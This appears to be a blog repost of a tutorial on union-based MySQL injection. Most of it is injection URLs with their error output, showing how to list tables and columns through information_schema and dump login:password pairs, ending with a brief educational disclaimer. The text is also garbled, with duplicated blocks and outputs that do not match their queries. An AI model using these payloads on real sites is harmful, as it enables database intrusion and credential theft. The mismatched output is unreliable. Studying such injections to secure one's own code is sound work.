We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique)
Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:-
Discover The Infamous MySQL Injection Technique
Understand the technique MySQL Injection:
Searching Column (s) of a given table
It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?
There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.
Understand the technique MySQL Injection:
One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application.
(Figure 1) Detecting
Searching Column number (s): We will test earlier in error, then no error may be said to find.
(Figure 2) SQL Error
Host Information,
Version of MySQL system used on the server.
(Figure 3) Host Information
(Figure 4) Location of the Files
Current database connection used between the "input" to the MySQL system
(Figure 5) Users of MySQL
(Figure 6) Current Time
Brute Force or Shooting
This happens in versions below 5.x.y
(Figure 7) Testing
Dump: This happens in versions up 5.x.y [ 1º
Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name)
from information_schema.tables
where table_schema=database()--
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1
[ 2º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1
[ 2º Method ]
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--
Unknown column 'CHARACTER_SETS' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1
Unknown column 'CHARACTER_SETS' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name)
from information_schema.tables
limit 1,2--
Unknown column 'COLLATIONS' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1
Unknown column 'COLLATIONS' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name)
from information_schema.tables
limit 16,17--
Unknown column 'usuarios' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1
Unknown column 'usuarios' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name)
from information_schema.tables
limit 17,18--
Unknown column 'rafael' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
Unknown column 'rafael' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1
Searching Column (s) of a given table
* Brute
Force / Shooting
happens in versions below 5.x.y
http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--
column 'rafael1' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--
column 'rafael1' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--
Unknown column '_Rafa_' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1
Unknown column '_Rafa_' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--
Unknown column 'rafael1337' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1
Unknown column 'rafael1337' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1
happens in versions up 5.x.y [ 1º Method ]
"usuarios" hexadecimal -> "7573756172696f73"
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
"usuarios" hexadecimal -> "7573756172696f73"
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--
Unknown column 'login,passwd,id,texto' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1
[ 2º Method ]
"usuarios" decimal -> "117,115,117,97,114,105,111,115"
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
Unknown column 'login,passwd,id,texto' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1
[ 2º Method ]
"usuarios" decimal -> "117,115,117,97,114,105,111,115"
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--
Unknown column 'login' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1
Unknown column 'login' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name)
from information_schema.columns
where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--
Unknown column 'passwd' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1
Unknown column 'passwd' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name)
from information_schema.columns
where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--
Unknown column 'id' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1
Unknown column 'id' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name)
from information_schema.columns
where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--
Unknown column 'text' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
Unknown column 'text' in 'where clause'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1
data from the columns of a given table
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from
_Rafa_ : fontes1337
Unknown column '_Rafa_ : fontes1337' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1
Unknown column '_Rafa_ : fontes1337' in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from
_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers :
mitnick,green : rha_infosec
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1
http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from
_RHA_ : infosec1337
Unknown column '_RHA_ : infosec1337‘ in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1
Unknown column '_RHA_ : infosec1337‘ in 'field list'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1
group_concat() => Search all you want with ascii caracters
group_concat() => Search all you want with ascii caracters
concat() => search what you want with ascii caracters
=> unite
0x3a => :
0x20 => space
0x2d => -
0x2b => +
0x3a => :
0x20 => space
0x2d => -
0x2b => +
this article is for educational purposes only, could continue explaining how to
exploit web sites, but that is not my intention.
It is
known that the impact of the change may provide unauthorized access to a
restricted area, being imperceptible to the eye of an inexperienced developer,
it may also allow the deletion of a table, compromising the entire application,
among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.
companies are providing important information on its website and database,
information is the most valuable asset is intangible, the question is how
developers are dealing with this huge responsibility?
challenge is to develop increasingly innovative sites, coupled with mechanisms
that will provide security to users.
purpose of this paper is to present what is SQL Injection, how applications are
explored and techniques for testing by allowing the developer to customize a
system more robust and understand the vulnerability.
I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution.
To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH.